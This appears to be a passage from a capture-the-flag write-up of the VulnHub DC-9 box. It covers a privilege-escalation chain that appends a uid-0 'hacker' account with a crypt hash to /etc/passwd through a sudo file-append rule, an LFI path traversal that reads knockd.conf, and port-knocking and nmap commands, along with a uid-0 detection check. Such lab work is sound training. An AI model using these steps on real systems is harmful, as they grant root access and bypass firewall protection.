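# crypt(3)-style password field: $id$salt$hash ($1 MD5-crypt, $5/$6 SHA-crypt, $y yescrypt, $2x bcrypt)
CRYPT_RE = re.compile(r"^\$(1|5|6|y|2[aby])\$[^:\n]+$")


def make_passwd_entry(user, crypt_hash, uid=0, gid=0, home="/root", shell="/bin/bash"):
    """Build one /etc/passwd line, refusing values that would corrupt the file."""
    if not re.fullmatch(r"[a-z_][a-z0-9_-]*", user):
        raise ValueError("bad username")
    if not CRYPT_RE.match(crypt_hash):
        raise ValueError("password field must be a crypt(3) hash, not plaintext")
    for field in (home, shell):
        if ":" in field or "\n" in field:
            raise ValueError("colon or newline in field")
    return f"{user}:{crypt_hash}:{uid}:{gid}::{home}:{shell}\n"


def append_file(src, dst):
    """Same primitive as the box's test.py: read src, append to dst.
    Run via the sudo rule, dst is written as root."""
    with open(src) as f:
        data = f.read()
    with open(dst, "a") as f:
        f.write(data)


def uid0_accounts(passwd_text):
    """Defender's check: every account with uid 0. Anything besides root is suspicious."""
    return [line.split(":")[0] for line in passwd_text.splitlines()
            if len(line.split(":")) == 7 and line.split(":")[2] == "0"]


def demo():
    """Run the chain against a scratch passwd; returns the uid-0 account list afterwards."""
    entry = make_passwd_entry("hacker", "$1$pQ66hyxc$rTHGWGC/aQ0uW9JoEFtcY1")
    with tempfile.TemporaryDirectory() as d:
        payload = os.path.join(d, "1.txt")       # stands in for /home/fredf/1.txt
        passwd = os.path.join(d, "passwd")       # constructed stand-in for /etc/passwd
        with open(payload, "w") as f:
            f.write(entry)
        with open(passwd, "w") as f:
            f.write("root:x:0:0:root:/root:/bin/bash\n"
                    "fredf:x:1003:1003::/home/fredf:/bin/bash\n")
        append_file(payload, passwd)             # what `sudo .../test 1.txt /etc/passwd` does
        with open(passwd) as f:
            return uid0_accounts(f.read())


if __name__ == "__main__":
    print(demo())
```

One caveat the primitive does not handle: it appends bytes verbatim, so if the target file does not end in a newline the new entry fuses with the last existing line. echo adds the trailing newline on the payload side, but check the target with `tail -c1 /etc/passwd | xxd` first. On the detection side, `uid0_accounts` is the same query as `awk -F: '$3 == 0' /etc/passwd`, which belongs in any host baseline check.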

The flag:

███╗   ██╗██╗ ██████╗███████╗    ██╗    ██╗ ██████╗ ██████╗ ██╗  ██╗██╗██╗██╗
████╗  ██║██║██╔════╝██╔════╝    ██║    ██║██╔═══██╗██╔══██╗██║ ██╔╝██║██║██║
██╔██╗ ██║██║██║     █████╗      ██║ █╗ ██║██║   ██║██████╔╝█████╔╝ ██║██║██║
██║╚██╗██║██║██║     ██╔══╝      ██║███╗██║██║   ██║██╔══██╗██╔═██╗ ╚═╝╚═╝╚═╝
██║ ╚████║██║╚██████╗███████╗    ╚███╔███╔╝╚██████╔╝██║  ██║██║  ██╗██╗██╗██╗
╚═╝  ╚═══╝╚═╝ ╚═════╝╚══════╝     ╚══╝╚══╝  ╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═╝╚═╝╚═╝╚═╝

Congratulations - you have done well to get to this point.

Hope you enjoyed DC-9. Just wanted to send out a big thanks to all those
who have taken the time to complete the various DC challenges.

I also want to send out a big thank you to the various members of @m0tl3ycr3w .

They are an inspirational bunch of fellows.

Sure, they might smell a bit, but...just kidding. :-)

Sadly, all things must come to an end, and this will be the last ever
challenge in the DC series.

So long, and thanks for all the fish.

Port knocking

I only learned from a writeup that there is a port-knock lock on this box.

Port knocking is a concealment technique: a client sends connection attempts (knocks) to a specific sequence of ports, and a daemon on the host then dynamically opens a firewall port (for example SSH) for that client.

But I never knocked earlier; possibly some script knocked by accident without my noticing.

Knocking manually

Find the knock sequence with the LFI:

?file=../../../../etc/knockd.conf

image-20260225204231107

The sequence is

7469,8475,9842

Use the knock client (it ships with the knockd package):

apt install knockd
knock 192.168.1.12 7469 8475 9842

Scan again with nmap:

nmap -p- --min-rate 10000 192.168.1.12 -oN nmap/port.txt

image-20260225204504222
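When the knock client is not available, the knock is just three connection attempts in the right order, each within the daemon's seq_timeout of the previous one. This is an added example, not code from the writeup: it parses a knockd.conf in knockd's documented [door] format to recover each door's sequence, then sends the knocks with plain sockets. The config text is constructed for the example; only the open sequence 7469,8475,9842 comes from the page, while the seq_timeout, the iptables commands and the closeSSH door are assumptions modelled on a typical knockd setup.

```python
import re
import socket
import time

# Constructed knockd.conf for this example (not the file read from the box).
SAMPLE_KNOCKD_CONF = """\
[options]
    UseSyslog

[openSSH]
    sequence    = 7469,8475,9842
    seq_timeout = 25
    command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn

[closeSSH]
    sequence    = 9842,8475,7469
    seq_timeout = 25
    command     = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn
"""


def parse_knockd(text):
    """Return {door: {'sequence': [(port, proto), ...], 'seq_timeout': int, ...}}
    for every section except [options]."""
    doors, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = re.match(r"^\[(.+)\]$", line)
        if m:
            current = m.group(1) if m.group(1) != "options" else None
            if current is not None:
                doors[current] = {}
            continue
        if current is None or "=" not in line:
            continue
        key, value = (s.strip() for s in line.split("=", 1))
        if key == "sequence":
            seq = []
            for item in value.split(","):          # knockd allows "port" or "port:udp"
                port, _, proto = item.strip().partition(":")
                seq.append((int(port), proto or "tcp"))
            doors[current][key] = seq
        elif key == "seq_timeout":
            doors[current][key] = int(value)
        else:
            doors[current][key] = value
    return doors


def knock(host, sequence, delay=0.2, timeout=0.5):
    """Send one connection attempt per port, in order, and return the ports hit.
    A TCP connect() emits the SYN the daemon watches for; the connect itself is
    expected to fail (refused or timed out) because the port is closed."""
    attempted = []
    for port, proto in sequence:
        kind = socket.SOCK_DGRAM if proto == "udp" else socket.SOCK_STREAM
        s = socket.socket(socket.AF_INET, kind)
        s.settimeout(timeout)
        try:
            if proto == "udp":
                s.sendto(b"x", (host, port))
            else:
                s.connect((host, port))
        except OSError:
            pass
        finally:
            s.close()
        attempted.append(port)
        time.sleep(delay)
    return attempted


if __name__ == "__main__":
    doors = parse_knockd(SAMPLE_KNOCKD_CONF)
    print(knock("192.168.1.12", doors["openSSH"]["sequence"]))
```

Two things to keep in mind when knocking by hand: the whole sequence has to land inside seq_timeout, so do not pace the knocks in separate shell invocations with long gaps, and in the usual configuration the rule that opens port 22 is keyed to the knocking source address (%IP%), so the scan and the SSH session must come from the same host as the knock.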


VulnHub DC
http://xiaowu5.cn/2026/02/25/VulnHub-DC/
Author: 5
Published: 2026-02-25
License: BY XIAOWU